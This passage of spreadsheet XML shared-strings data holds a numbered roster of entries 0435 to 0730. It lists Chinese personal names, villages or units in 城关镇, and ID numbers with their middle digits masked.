    <t>褚清瑞</t>
  </si>
  <si>
    <t>0435</t>
  </si>
  <si>
    <t>城关镇东北村</t>
  </si>
  <si>
    <t>马秋</t>
  </si>
  <si>
    <t>0436</t>
  </si>
  <si>
    <t>耿明多</t>
  </si>
  <si>
    <t>412921********0082</t>
  </si>
  <si>
    <t>0437</t>
  </si>
  <si>
    <t>魏廷芳</t>
  </si>
  <si>
    <t>0438</t>
  </si>
  <si>
    <t>程栓成</t>
  </si>
  <si>
    <t>0439</t>
  </si>
  <si>
    <t>周文成</t>
  </si>
  <si>
    <t>412921********0053</t>
  </si>
  <si>
    <t>0440</t>
  </si>
  <si>
    <t>温延荣</t>
  </si>
  <si>
    <t>0441</t>
  </si>
  <si>
    <t>楚德海</t>
  </si>
  <si>
    <t>0442</t>
  </si>
  <si>
    <t>靳三荣</t>
  </si>
  <si>
    <t>0443</t>
  </si>
  <si>
    <t>城关镇西北村</t>
  </si>
  <si>
    <t>高玉明</t>
  </si>
  <si>
    <t>0444</t>
  </si>
  <si>
    <t>仝凌举</t>
  </si>
  <si>
    <t>411321********0014</t>
  </si>
  <si>
    <t>0445</t>
  </si>
  <si>
    <t>吴青风</t>
  </si>
  <si>
    <t>0446</t>
  </si>
  <si>
    <t>李林德</t>
  </si>
  <si>
    <t>0447</t>
  </si>
  <si>
    <t>李德敏</t>
  </si>
  <si>
    <t>412921********0065</t>
  </si>
  <si>
    <t>0448</t>
  </si>
  <si>
    <t>杜保云</t>
  </si>
  <si>
    <t>0449</t>
  </si>
  <si>
    <t>范永旺</t>
  </si>
  <si>
    <t>0450</t>
  </si>
  <si>
    <t>张天凤</t>
  </si>
  <si>
    <t>0451</t>
  </si>
  <si>
    <t>卞勤</t>
  </si>
  <si>
    <t>0452</t>
  </si>
  <si>
    <t>赵明</t>
  </si>
  <si>
    <t>0453</t>
  </si>
  <si>
    <t>赵远振</t>
  </si>
  <si>
    <t>411326********3613</t>
  </si>
  <si>
    <t>0454</t>
  </si>
  <si>
    <t>张庆兰</t>
  </si>
  <si>
    <t>0455</t>
  </si>
  <si>
    <t>史长勤</t>
  </si>
  <si>
    <t>412921********5527</t>
  </si>
  <si>
    <t>0456</t>
  </si>
  <si>
    <t>王晓</t>
  </si>
  <si>
    <t>0457</t>
  </si>
  <si>
    <t>城关北外村</t>
  </si>
  <si>
    <t>常洪彦</t>
  </si>
  <si>
    <t>0458</t>
  </si>
  <si>
    <t>王家豪</t>
  </si>
  <si>
    <t>411321********0019</t>
  </si>
  <si>
    <t>0459</t>
  </si>
  <si>
    <t>刘保林</t>
  </si>
  <si>
    <t>0460</t>
  </si>
  <si>
    <t>王淑芝</t>
  </si>
  <si>
    <t>412921********0245</t>
  </si>
  <si>
    <t>0461</t>
  </si>
  <si>
    <t>邵新</t>
  </si>
  <si>
    <t>0462</t>
  </si>
  <si>
    <t>吉春旭</t>
  </si>
  <si>
    <t>412921********1510</t>
  </si>
  <si>
    <t>0463</t>
  </si>
  <si>
    <t>刘青芳</t>
  </si>
  <si>
    <t>411326********0040</t>
  </si>
  <si>
    <t>0464</t>
  </si>
  <si>
    <t>谷春方</t>
  </si>
  <si>
    <t>0465</t>
  </si>
  <si>
    <t>沈金焕</t>
  </si>
  <si>
    <t>0466</t>
  </si>
  <si>
    <t>邵龙</t>
  </si>
  <si>
    <t>0467</t>
  </si>
  <si>
    <t>王明春</t>
  </si>
  <si>
    <t>0468</t>
  </si>
  <si>
    <t>张沛</t>
  </si>
  <si>
    <t>0469</t>
  </si>
  <si>
    <t>石洪建</t>
  </si>
  <si>
    <t>412921********0079</t>
  </si>
  <si>
    <t>0470</t>
  </si>
  <si>
    <t>李玉敏</t>
  </si>
  <si>
    <t>0471</t>
  </si>
  <si>
    <t>杨广武</t>
  </si>
  <si>
    <t>412921********0318</t>
  </si>
  <si>
    <t>0472</t>
  </si>
  <si>
    <t>汤孝民</t>
  </si>
  <si>
    <t>0473</t>
  </si>
  <si>
    <t>杨寿杰</t>
  </si>
  <si>
    <t>412921********4043</t>
  </si>
  <si>
    <t>0474</t>
  </si>
  <si>
    <t>闫刚</t>
  </si>
  <si>
    <t>412921********0119</t>
  </si>
  <si>
    <t>0475</t>
  </si>
  <si>
    <t>范自秀</t>
  </si>
  <si>
    <t>0476</t>
  </si>
  <si>
    <t>城关镇北外村</t>
  </si>
  <si>
    <t>王付梅</t>
  </si>
  <si>
    <t>0477</t>
  </si>
  <si>
    <t>张心玲</t>
  </si>
  <si>
    <t>0478</t>
  </si>
  <si>
    <t>向广英</t>
  </si>
  <si>
    <t>412921********2941</t>
  </si>
  <si>
    <t>0479</t>
  </si>
  <si>
    <t>郑爱芬</t>
  </si>
  <si>
    <t>0480</t>
  </si>
  <si>
    <t>段芳</t>
  </si>
  <si>
    <t>0481</t>
  </si>
  <si>
    <t>马润坤</t>
  </si>
  <si>
    <t>411326********0027</t>
  </si>
  <si>
    <t>0482</t>
  </si>
  <si>
    <t>白广荣</t>
  </si>
  <si>
    <t>0483</t>
  </si>
  <si>
    <t>蒋丰梅</t>
  </si>
  <si>
    <t>0484</t>
  </si>
  <si>
    <t>王爱臣</t>
  </si>
  <si>
    <t>0485</t>
  </si>
  <si>
    <t>郭新芳</t>
  </si>
  <si>
    <t>0486</t>
  </si>
  <si>
    <t>余明</t>
  </si>
  <si>
    <t>0487</t>
  </si>
  <si>
    <t>郭书杰</t>
  </si>
  <si>
    <t>0488</t>
  </si>
  <si>
    <t>刘国勤</t>
  </si>
  <si>
    <t>0489</t>
  </si>
  <si>
    <t>侯其华</t>
  </si>
  <si>
    <t>0490</t>
  </si>
  <si>
    <t>丁国顺</t>
  </si>
  <si>
    <t>0491</t>
  </si>
  <si>
    <t>闫玉轩</t>
  </si>
  <si>
    <t>412922********2057</t>
  </si>
  <si>
    <t>0492</t>
  </si>
  <si>
    <t>蔺三</t>
  </si>
  <si>
    <t>0493</t>
  </si>
  <si>
    <t>薛志云</t>
  </si>
  <si>
    <t>0494</t>
  </si>
  <si>
    <t>吴保伟</t>
  </si>
  <si>
    <t>0495</t>
  </si>
  <si>
    <t>隋春雷</t>
  </si>
  <si>
    <t>0496</t>
  </si>
  <si>
    <t>隋宏振</t>
  </si>
  <si>
    <t>411321********0018</t>
  </si>
  <si>
    <t>0497</t>
  </si>
  <si>
    <t>任兴强</t>
  </si>
  <si>
    <t>0498</t>
  </si>
  <si>
    <t xml:space="preserve">郭玉芝 </t>
  </si>
  <si>
    <t>0499</t>
  </si>
  <si>
    <t>蔡庆昌</t>
  </si>
  <si>
    <t>0500</t>
  </si>
  <si>
    <t>雷彬</t>
  </si>
  <si>
    <t>0501</t>
  </si>
  <si>
    <t>庞大方</t>
  </si>
  <si>
    <t>0502</t>
  </si>
  <si>
    <t>张金华</t>
  </si>
  <si>
    <t>412921********0163</t>
  </si>
  <si>
    <t>0503</t>
  </si>
  <si>
    <t>蒋小云</t>
  </si>
  <si>
    <t>0504</t>
  </si>
  <si>
    <t>朱运喜</t>
  </si>
  <si>
    <t>0505</t>
  </si>
  <si>
    <t>城关镇东北东北六组</t>
  </si>
  <si>
    <t>许小焕</t>
  </si>
  <si>
    <t>0506</t>
  </si>
  <si>
    <t>李书良</t>
  </si>
  <si>
    <t>412921********0133</t>
  </si>
  <si>
    <t>0507</t>
  </si>
  <si>
    <t>刘清亮</t>
  </si>
  <si>
    <t>0508</t>
  </si>
  <si>
    <t>陈峰</t>
  </si>
  <si>
    <t>412921********1579</t>
  </si>
  <si>
    <t>0509</t>
  </si>
  <si>
    <t>邓秀</t>
  </si>
  <si>
    <t>0510</t>
  </si>
  <si>
    <t>高中付</t>
  </si>
  <si>
    <t>0511</t>
  </si>
  <si>
    <t>靳德连</t>
  </si>
  <si>
    <t>0512</t>
  </si>
  <si>
    <t>李天才</t>
  </si>
  <si>
    <t>0513</t>
  </si>
  <si>
    <t>张保仁</t>
  </si>
  <si>
    <t>0514</t>
  </si>
  <si>
    <t>张阳</t>
  </si>
  <si>
    <t>0515</t>
  </si>
  <si>
    <t>王相明</t>
  </si>
  <si>
    <t>0516</t>
  </si>
  <si>
    <t>徐振方</t>
  </si>
  <si>
    <t>0517</t>
  </si>
  <si>
    <t>张金龙</t>
  </si>
  <si>
    <t>0518</t>
  </si>
  <si>
    <t>李焕</t>
  </si>
  <si>
    <t>0519</t>
  </si>
  <si>
    <t>贾桂兰</t>
  </si>
  <si>
    <t>0520</t>
  </si>
  <si>
    <t>文德庆</t>
  </si>
  <si>
    <t>0521</t>
  </si>
  <si>
    <t>张秀会</t>
  </si>
  <si>
    <t>0522</t>
  </si>
  <si>
    <t>汪大琴</t>
  </si>
  <si>
    <t>0523</t>
  </si>
  <si>
    <t>马作平</t>
  </si>
  <si>
    <t>412921********0348</t>
  </si>
  <si>
    <t>0524</t>
  </si>
  <si>
    <t>随广菊</t>
  </si>
  <si>
    <t>0525</t>
  </si>
  <si>
    <t>王菊花</t>
  </si>
  <si>
    <t>0526</t>
  </si>
  <si>
    <t>陈海芳</t>
  </si>
  <si>
    <t>0527</t>
  </si>
  <si>
    <t>崔国荣</t>
  </si>
  <si>
    <t>0528</t>
  </si>
  <si>
    <t>李玉军</t>
  </si>
  <si>
    <t>0529</t>
  </si>
  <si>
    <t>王春生</t>
  </si>
  <si>
    <t>412921********0075</t>
  </si>
  <si>
    <t>0530</t>
  </si>
  <si>
    <t>陈荣珍</t>
  </si>
  <si>
    <t>412921********0263</t>
  </si>
  <si>
    <t>0531</t>
  </si>
  <si>
    <t>刘德祥</t>
  </si>
  <si>
    <t>412921********0237</t>
  </si>
  <si>
    <t>0532</t>
  </si>
  <si>
    <t>牛清杰</t>
  </si>
  <si>
    <t>0533</t>
  </si>
  <si>
    <t>刘洋</t>
  </si>
  <si>
    <t>0534</t>
  </si>
  <si>
    <t>赵玉燕</t>
  </si>
  <si>
    <t>412921********024X</t>
  </si>
  <si>
    <t>0535</t>
  </si>
  <si>
    <t>张萍</t>
  </si>
  <si>
    <t>0536</t>
  </si>
  <si>
    <t>赵书琴</t>
  </si>
  <si>
    <t>412921********0281</t>
  </si>
  <si>
    <t>0537</t>
  </si>
  <si>
    <t>杨福群</t>
  </si>
  <si>
    <t>412921********007X</t>
  </si>
  <si>
    <t>0538</t>
  </si>
  <si>
    <t>蔡伟</t>
  </si>
  <si>
    <t>0539</t>
  </si>
  <si>
    <t>梁泽波</t>
  </si>
  <si>
    <t>0540</t>
  </si>
  <si>
    <t>梁锦程</t>
  </si>
  <si>
    <t>411321********0132</t>
  </si>
  <si>
    <t>0541</t>
  </si>
  <si>
    <t>李先平</t>
  </si>
  <si>
    <t>412921********5284</t>
  </si>
  <si>
    <t>0542</t>
  </si>
  <si>
    <t>任洪军</t>
  </si>
  <si>
    <t>0543</t>
  </si>
  <si>
    <t>符伟</t>
  </si>
  <si>
    <t>0544</t>
  </si>
  <si>
    <t>张燕</t>
  </si>
  <si>
    <t>0545</t>
  </si>
  <si>
    <t>刘青梅</t>
  </si>
  <si>
    <t>0546</t>
  </si>
  <si>
    <t>刘德有</t>
  </si>
  <si>
    <t>412921********029X</t>
  </si>
  <si>
    <t>0547</t>
  </si>
  <si>
    <t>贺荣芳</t>
  </si>
  <si>
    <t>412921********0327</t>
  </si>
  <si>
    <t>0548</t>
  </si>
  <si>
    <t>陈庆芳</t>
  </si>
  <si>
    <t>0549</t>
  </si>
  <si>
    <t>王鑫梦</t>
  </si>
  <si>
    <t>411321********0043</t>
  </si>
  <si>
    <t>0550</t>
  </si>
  <si>
    <t>吴峰</t>
  </si>
  <si>
    <t>0551</t>
  </si>
  <si>
    <t>张晓薇</t>
  </si>
  <si>
    <t>412921********3660</t>
  </si>
  <si>
    <t>0552</t>
  </si>
  <si>
    <t>李中震</t>
  </si>
  <si>
    <t>0553</t>
  </si>
  <si>
    <t>张学建</t>
  </si>
  <si>
    <t>0554</t>
  </si>
  <si>
    <t>赵国勤</t>
  </si>
  <si>
    <t>0555</t>
  </si>
  <si>
    <t>高书强</t>
  </si>
  <si>
    <t>0556</t>
  </si>
  <si>
    <t>李林春</t>
  </si>
  <si>
    <t>0557</t>
  </si>
  <si>
    <t>李兴兰</t>
  </si>
  <si>
    <t>0558</t>
  </si>
  <si>
    <t>邵金元</t>
  </si>
  <si>
    <t>0559</t>
  </si>
  <si>
    <t>郭新珍</t>
  </si>
  <si>
    <t>0560</t>
  </si>
  <si>
    <t>张保华</t>
  </si>
  <si>
    <t>0561</t>
  </si>
  <si>
    <t>城关镇西北</t>
  </si>
  <si>
    <t>张熙迅</t>
  </si>
  <si>
    <t>411321********0073</t>
  </si>
  <si>
    <t>0562</t>
  </si>
  <si>
    <t>城关镇中华</t>
  </si>
  <si>
    <t>刘长海</t>
  </si>
  <si>
    <t>0563</t>
  </si>
  <si>
    <t>刘俊梅</t>
  </si>
  <si>
    <t>0564</t>
  </si>
  <si>
    <t>褚青明</t>
  </si>
  <si>
    <t>411326********2411</t>
  </si>
  <si>
    <t>0565</t>
  </si>
  <si>
    <t>周旭</t>
  </si>
  <si>
    <t>411321********5116</t>
  </si>
  <si>
    <t>0566</t>
  </si>
  <si>
    <t>张涵</t>
  </si>
  <si>
    <t>411321********0068</t>
  </si>
  <si>
    <t>0567</t>
  </si>
  <si>
    <t>张统</t>
  </si>
  <si>
    <t>411321********6130</t>
  </si>
  <si>
    <t>0568</t>
  </si>
  <si>
    <t>褚松梅</t>
  </si>
  <si>
    <t>412921********0264</t>
  </si>
  <si>
    <t>0569</t>
  </si>
  <si>
    <t>韩桂套</t>
  </si>
  <si>
    <t>0570</t>
  </si>
  <si>
    <t>董正英</t>
  </si>
  <si>
    <t>0571</t>
  </si>
  <si>
    <t>张金平</t>
  </si>
  <si>
    <t>0572</t>
  </si>
  <si>
    <t>马全兴</t>
  </si>
  <si>
    <t>0573</t>
  </si>
  <si>
    <t>雷建朝</t>
  </si>
  <si>
    <t>0574</t>
  </si>
  <si>
    <t>蔡花</t>
  </si>
  <si>
    <t>0575</t>
  </si>
  <si>
    <t>法秀钦</t>
  </si>
  <si>
    <t>0576</t>
  </si>
  <si>
    <t>王光孝</t>
  </si>
  <si>
    <t>0577</t>
  </si>
  <si>
    <t>崔建生</t>
  </si>
  <si>
    <t>0578</t>
  </si>
  <si>
    <t>华德芳</t>
  </si>
  <si>
    <t>0579</t>
  </si>
  <si>
    <t>刘发祥</t>
  </si>
  <si>
    <t>0580</t>
  </si>
  <si>
    <t>靳洪梅</t>
  </si>
  <si>
    <t>0581</t>
  </si>
  <si>
    <t>李树强</t>
  </si>
  <si>
    <t>412921********2811</t>
  </si>
  <si>
    <t>0582</t>
  </si>
  <si>
    <t>王瑞兰</t>
  </si>
  <si>
    <t>0583</t>
  </si>
  <si>
    <t>张书军</t>
  </si>
  <si>
    <t>0584</t>
  </si>
  <si>
    <t>韩桂芝</t>
  </si>
  <si>
    <t>0585</t>
  </si>
  <si>
    <t>张永莲</t>
  </si>
  <si>
    <t>0586</t>
  </si>
  <si>
    <t>张德霞</t>
  </si>
  <si>
    <t>0587</t>
  </si>
  <si>
    <t>张书征</t>
  </si>
  <si>
    <t>0588</t>
  </si>
  <si>
    <t>郭德献</t>
  </si>
  <si>
    <t>0589</t>
  </si>
  <si>
    <t>尹玉春</t>
  </si>
  <si>
    <t>0590</t>
  </si>
  <si>
    <t>王运芝</t>
  </si>
  <si>
    <t>0591</t>
  </si>
  <si>
    <t>柏洪山</t>
  </si>
  <si>
    <t>0592</t>
  </si>
  <si>
    <t>王文会</t>
  </si>
  <si>
    <t>412921********0104</t>
  </si>
  <si>
    <t>0593</t>
  </si>
  <si>
    <t>李杰</t>
  </si>
  <si>
    <t>0594</t>
  </si>
  <si>
    <t>谷大伟</t>
  </si>
  <si>
    <t>0595</t>
  </si>
  <si>
    <t>苗青杰</t>
  </si>
  <si>
    <t>0596</t>
  </si>
  <si>
    <t>尚玉勤</t>
  </si>
  <si>
    <t>412921********0181</t>
  </si>
  <si>
    <t>0597</t>
  </si>
  <si>
    <t>张清云</t>
  </si>
  <si>
    <t>0598</t>
  </si>
  <si>
    <t>李国勤</t>
  </si>
  <si>
    <t>0599</t>
  </si>
  <si>
    <t>宋华伟</t>
  </si>
  <si>
    <t>0600</t>
  </si>
  <si>
    <t>田付炬</t>
  </si>
  <si>
    <t>0601</t>
  </si>
  <si>
    <t>田启锋</t>
  </si>
  <si>
    <t>411321********0017</t>
  </si>
  <si>
    <t>0602</t>
  </si>
  <si>
    <t>高相云</t>
  </si>
  <si>
    <t>0603</t>
  </si>
  <si>
    <t>王德兰</t>
  </si>
  <si>
    <t>0604</t>
  </si>
  <si>
    <t>孙运杰</t>
  </si>
  <si>
    <t>412921********0332</t>
  </si>
  <si>
    <t>0605</t>
  </si>
  <si>
    <t>张福海</t>
  </si>
  <si>
    <t>412921********0090</t>
  </si>
  <si>
    <t>0606</t>
  </si>
  <si>
    <t>汤惠银</t>
  </si>
  <si>
    <t>411321********0026</t>
  </si>
  <si>
    <t>0607</t>
  </si>
  <si>
    <t>郑多勤</t>
  </si>
  <si>
    <t>0608</t>
  </si>
  <si>
    <t>吕春斗</t>
  </si>
  <si>
    <t>412921********0374</t>
  </si>
  <si>
    <t>0609</t>
  </si>
  <si>
    <t>贾红广</t>
  </si>
  <si>
    <t>0610</t>
  </si>
  <si>
    <t>李金贵</t>
  </si>
  <si>
    <t>412921********4027</t>
  </si>
  <si>
    <t>0611</t>
  </si>
  <si>
    <t>李彦霖</t>
  </si>
  <si>
    <t>411326********0129</t>
  </si>
  <si>
    <t>0612</t>
  </si>
  <si>
    <t>郑慎振</t>
  </si>
  <si>
    <t>411321********3314</t>
  </si>
  <si>
    <t>0613</t>
  </si>
  <si>
    <t>董大永</t>
  </si>
  <si>
    <t>411326********0015</t>
  </si>
  <si>
    <t>0614</t>
  </si>
  <si>
    <t>董佳欣</t>
  </si>
  <si>
    <t>411321********5344</t>
  </si>
  <si>
    <t>0615</t>
  </si>
  <si>
    <t>吴荣林</t>
  </si>
  <si>
    <t>0616</t>
  </si>
  <si>
    <t>冯勤</t>
  </si>
  <si>
    <t>0617</t>
  </si>
  <si>
    <t>石贤中</t>
  </si>
  <si>
    <t>0618</t>
  </si>
  <si>
    <t>白小玲</t>
  </si>
  <si>
    <t>0619</t>
  </si>
  <si>
    <t>师新杰</t>
  </si>
  <si>
    <t>412921********1167</t>
  </si>
  <si>
    <t>0620</t>
  </si>
  <si>
    <t>任龙</t>
  </si>
  <si>
    <t>411326********003X</t>
  </si>
  <si>
    <t>0621</t>
  </si>
  <si>
    <t>曾俊英</t>
  </si>
  <si>
    <t>0622</t>
  </si>
  <si>
    <t>刘丙朝</t>
  </si>
  <si>
    <t>0623</t>
  </si>
  <si>
    <t>裴华</t>
  </si>
  <si>
    <t>0624</t>
  </si>
  <si>
    <t>孔德华</t>
  </si>
  <si>
    <t>0625</t>
  </si>
  <si>
    <t>刘中举</t>
  </si>
  <si>
    <t>0626</t>
  </si>
  <si>
    <t>城关西北</t>
  </si>
  <si>
    <t>王宏斌</t>
  </si>
  <si>
    <t>0627</t>
  </si>
  <si>
    <t>王健</t>
  </si>
  <si>
    <t>0628</t>
  </si>
  <si>
    <t>尹延娜</t>
  </si>
  <si>
    <t>411326********0029</t>
  </si>
  <si>
    <t>0629</t>
  </si>
  <si>
    <t>城关中华</t>
  </si>
  <si>
    <t>栗桂杰</t>
  </si>
  <si>
    <t>0630</t>
  </si>
  <si>
    <t>李录荣</t>
  </si>
  <si>
    <t>0631</t>
  </si>
  <si>
    <t>马小壮</t>
  </si>
  <si>
    <t>0632</t>
  </si>
  <si>
    <t>马鑫钰</t>
  </si>
  <si>
    <t>411326********0024</t>
  </si>
  <si>
    <t>0633</t>
  </si>
  <si>
    <t>徐文丰</t>
  </si>
  <si>
    <t>412921********4421</t>
  </si>
  <si>
    <t>0634</t>
  </si>
  <si>
    <t>张红亮</t>
  </si>
  <si>
    <t>0635</t>
  </si>
  <si>
    <t>韩付勤</t>
  </si>
  <si>
    <t>0636</t>
  </si>
  <si>
    <t>城关东北</t>
  </si>
  <si>
    <t>马万阁</t>
  </si>
  <si>
    <t>0637</t>
  </si>
  <si>
    <t>樊金山</t>
  </si>
  <si>
    <t>411326********0053</t>
  </si>
  <si>
    <t>0638</t>
  </si>
  <si>
    <t>司保莲</t>
  </si>
  <si>
    <t>0639</t>
  </si>
  <si>
    <t>高书敏</t>
  </si>
  <si>
    <t>0640</t>
  </si>
  <si>
    <t>李玉强</t>
  </si>
  <si>
    <t>0641</t>
  </si>
  <si>
    <t>席云秀</t>
  </si>
  <si>
    <t>0642</t>
  </si>
  <si>
    <t>蒋廷瑞</t>
  </si>
  <si>
    <t>0643</t>
  </si>
  <si>
    <t>杨万荣</t>
  </si>
  <si>
    <t>0644</t>
  </si>
  <si>
    <t>王勇</t>
  </si>
  <si>
    <t>411326********0033</t>
  </si>
  <si>
    <t>0645</t>
  </si>
  <si>
    <t>郭永信</t>
  </si>
  <si>
    <t>0646</t>
  </si>
  <si>
    <t>王玉勤</t>
  </si>
  <si>
    <t>412921********0084</t>
  </si>
  <si>
    <t>0647</t>
  </si>
  <si>
    <t>靳德洪</t>
  </si>
  <si>
    <t>0648</t>
  </si>
  <si>
    <t>王艺</t>
  </si>
  <si>
    <t>411326********0021</t>
  </si>
  <si>
    <t>0649</t>
  </si>
  <si>
    <t>张东洋</t>
  </si>
  <si>
    <t>411326********0446</t>
  </si>
  <si>
    <t>0650</t>
  </si>
  <si>
    <t>张世珍</t>
  </si>
  <si>
    <t>412921********0421</t>
  </si>
  <si>
    <t>0651</t>
  </si>
  <si>
    <t>代天荣</t>
  </si>
  <si>
    <t>0652</t>
  </si>
  <si>
    <t>芦明成</t>
  </si>
  <si>
    <t>0653</t>
  </si>
  <si>
    <t>李书爱</t>
  </si>
  <si>
    <t>0654</t>
  </si>
  <si>
    <t>朱德三</t>
  </si>
  <si>
    <t>0655</t>
  </si>
  <si>
    <t>魏文丽</t>
  </si>
  <si>
    <t>0656</t>
  </si>
  <si>
    <t>杨玉强</t>
  </si>
  <si>
    <t>0657</t>
  </si>
  <si>
    <t>刘清泉</t>
  </si>
  <si>
    <t>411321********0030</t>
  </si>
  <si>
    <t>0658</t>
  </si>
  <si>
    <t>刘清宇</t>
  </si>
  <si>
    <t>411321********0156</t>
  </si>
  <si>
    <t>0659</t>
  </si>
  <si>
    <t>张宗荣</t>
  </si>
  <si>
    <t>0660</t>
  </si>
  <si>
    <t>贾宗超</t>
  </si>
  <si>
    <t>0661</t>
  </si>
  <si>
    <t>闫学会</t>
  </si>
  <si>
    <t>412921********0120</t>
  </si>
  <si>
    <t>0662</t>
  </si>
  <si>
    <t>王召凤</t>
  </si>
  <si>
    <t>411321********0205</t>
  </si>
  <si>
    <t>0663</t>
  </si>
  <si>
    <t>闫清山</t>
  </si>
  <si>
    <t>411321********5156</t>
  </si>
  <si>
    <t>0664</t>
  </si>
  <si>
    <t>任冀</t>
  </si>
  <si>
    <t>0665</t>
  </si>
  <si>
    <t>王清彦</t>
  </si>
  <si>
    <t>0666</t>
  </si>
  <si>
    <t>黄芝云</t>
  </si>
  <si>
    <t>0667</t>
  </si>
  <si>
    <t>城关北外</t>
  </si>
  <si>
    <t>朱晓峰</t>
  </si>
  <si>
    <t>0668</t>
  </si>
  <si>
    <t>张建遇</t>
  </si>
  <si>
    <t>0669</t>
  </si>
  <si>
    <t>杜金平</t>
  </si>
  <si>
    <t>412921********3887</t>
  </si>
  <si>
    <t>0670</t>
  </si>
  <si>
    <t>董希东</t>
  </si>
  <si>
    <t>0671</t>
  </si>
  <si>
    <t>田芳</t>
  </si>
  <si>
    <t>0672</t>
  </si>
  <si>
    <t>董金丽</t>
  </si>
  <si>
    <t>0673</t>
  </si>
  <si>
    <t>刘炳强</t>
  </si>
  <si>
    <t>0674</t>
  </si>
  <si>
    <t>郭春云</t>
  </si>
  <si>
    <t>0675</t>
  </si>
  <si>
    <t>靳三鹏</t>
  </si>
  <si>
    <t>0676</t>
  </si>
  <si>
    <t>李帮玲</t>
  </si>
  <si>
    <t>0677</t>
  </si>
  <si>
    <t>刘中强</t>
  </si>
  <si>
    <t>0678</t>
  </si>
  <si>
    <t>乔瑞</t>
  </si>
  <si>
    <t>0679</t>
  </si>
  <si>
    <t>邵青连</t>
  </si>
  <si>
    <t>0680</t>
  </si>
  <si>
    <t>张支桂</t>
  </si>
  <si>
    <t>0681</t>
  </si>
  <si>
    <t>韩桂花</t>
  </si>
  <si>
    <t>0682</t>
  </si>
  <si>
    <t>刘清敏</t>
  </si>
  <si>
    <t>0683</t>
  </si>
  <si>
    <t>城关沙坪</t>
  </si>
  <si>
    <t>王荣军</t>
  </si>
  <si>
    <t>0684</t>
  </si>
  <si>
    <t>王超</t>
  </si>
  <si>
    <t>0685</t>
  </si>
  <si>
    <t>城关东北村</t>
  </si>
  <si>
    <t>王荣基</t>
  </si>
  <si>
    <t>411321********5638</t>
  </si>
  <si>
    <t>0686</t>
  </si>
  <si>
    <t>张丽</t>
  </si>
  <si>
    <t>0687</t>
  </si>
  <si>
    <t>张建</t>
  </si>
  <si>
    <t>0688</t>
  </si>
  <si>
    <t>孙长荣</t>
  </si>
  <si>
    <t>0689</t>
  </si>
  <si>
    <t>韩中远</t>
  </si>
  <si>
    <t>412921********2492</t>
  </si>
  <si>
    <t>0690</t>
  </si>
  <si>
    <t>王付明</t>
  </si>
  <si>
    <t>0691</t>
  </si>
  <si>
    <t>刘钦然</t>
  </si>
  <si>
    <t>411326********3629</t>
  </si>
  <si>
    <t>0692</t>
  </si>
  <si>
    <t>王兴平</t>
  </si>
  <si>
    <t>0693</t>
  </si>
  <si>
    <t>孙朝梅</t>
  </si>
  <si>
    <t>0694</t>
  </si>
  <si>
    <t>苏长荣</t>
  </si>
  <si>
    <t>0695</t>
  </si>
  <si>
    <t>城关中华村</t>
  </si>
  <si>
    <t>宋天云</t>
  </si>
  <si>
    <t>0696</t>
  </si>
  <si>
    <t>狄延飞</t>
  </si>
  <si>
    <t>0697</t>
  </si>
  <si>
    <t>徐振红</t>
  </si>
  <si>
    <t>0698</t>
  </si>
  <si>
    <t>李炫非</t>
  </si>
  <si>
    <t>411321********0022</t>
  </si>
  <si>
    <t>0699</t>
  </si>
  <si>
    <t>李冠桦</t>
  </si>
  <si>
    <t>411321********0134</t>
  </si>
  <si>
    <t>0700</t>
  </si>
  <si>
    <t>吴其伟</t>
  </si>
  <si>
    <t>0701</t>
  </si>
  <si>
    <t>刘昱灼</t>
  </si>
  <si>
    <t>411321********5609</t>
  </si>
  <si>
    <t>0702</t>
  </si>
  <si>
    <t>郭相玉</t>
  </si>
  <si>
    <t>0703</t>
  </si>
  <si>
    <t>崔雪</t>
  </si>
  <si>
    <t>0704</t>
  </si>
  <si>
    <t>城关西北村</t>
  </si>
  <si>
    <t>王运强</t>
  </si>
  <si>
    <t>0705</t>
  </si>
  <si>
    <t>王冬冬</t>
  </si>
  <si>
    <t>411326********0010</t>
  </si>
  <si>
    <t>0706</t>
  </si>
  <si>
    <t>贾作保</t>
  </si>
  <si>
    <t>411326********0059</t>
  </si>
  <si>
    <t>0707</t>
  </si>
  <si>
    <t>张继元</t>
  </si>
  <si>
    <t>411321********445X</t>
  </si>
  <si>
    <t>0708</t>
  </si>
  <si>
    <t>张万庆</t>
  </si>
  <si>
    <t>412921********0358</t>
  </si>
  <si>
    <t>0709</t>
  </si>
  <si>
    <t>蔡松</t>
  </si>
  <si>
    <t>0710</t>
  </si>
  <si>
    <t>蔡千姿</t>
  </si>
  <si>
    <t>411321********0186</t>
  </si>
  <si>
    <t>0711</t>
  </si>
  <si>
    <t>司建春</t>
  </si>
  <si>
    <t>412929********1340</t>
  </si>
  <si>
    <t>0712</t>
  </si>
  <si>
    <t>杨立琴</t>
  </si>
  <si>
    <t>0713</t>
  </si>
  <si>
    <t>张振敏</t>
  </si>
  <si>
    <t>0714</t>
  </si>
  <si>
    <t>李娟</t>
  </si>
  <si>
    <t>411381********1763</t>
  </si>
  <si>
    <t>0715</t>
  </si>
  <si>
    <t>王兴军</t>
  </si>
  <si>
    <t>0716</t>
  </si>
  <si>
    <t>段辛辛</t>
  </si>
  <si>
    <t>411321********0045</t>
  </si>
  <si>
    <t>0717</t>
  </si>
  <si>
    <t>城关镇工信局</t>
  </si>
  <si>
    <t>王俊云</t>
  </si>
  <si>
    <t>412921********442X</t>
  </si>
  <si>
    <t>0718</t>
  </si>
  <si>
    <t>张意柯</t>
  </si>
  <si>
    <t>411321********4425</t>
  </si>
  <si>
    <t>0719</t>
  </si>
  <si>
    <t>沈海莲</t>
  </si>
  <si>
    <t>0720</t>
  </si>
  <si>
    <t>刘德华</t>
  </si>
  <si>
    <t>0721</t>
  </si>
  <si>
    <t>城关镇政府</t>
  </si>
  <si>
    <t>吉召勤</t>
  </si>
  <si>
    <t>0722</t>
  </si>
  <si>
    <t>高玉成</t>
  </si>
  <si>
    <t>0723</t>
  </si>
  <si>
    <t>张文定</t>
  </si>
  <si>
    <t>412919********0194</t>
  </si>
  <si>
    <t>0724</t>
  </si>
  <si>
    <t>王万荣</t>
  </si>
  <si>
    <t>0725</t>
  </si>
  <si>
    <t>邢明珍</t>
  </si>
  <si>
    <t>0726</t>
  </si>
  <si>
    <t>郭廷仓</t>
  </si>
  <si>
    <t>0727</t>
  </si>
  <si>
    <t>王文兰</t>
  </si>
  <si>
    <t>0728</t>
  </si>
  <si>
    <t>贺启航</t>
  </si>
  <si>
    <t>0729</t>
  </si>
  <si>
    <t>城关政府</t>
  </si>
  <si>
    <t>黄浩瀚</t>
  </si>
  <si>
    <t>411326********0418</t>
  </si>
  <si>
    <t>0730</t>
  </si>
  <si>
    <t>城关镇东北</t>
  </si>
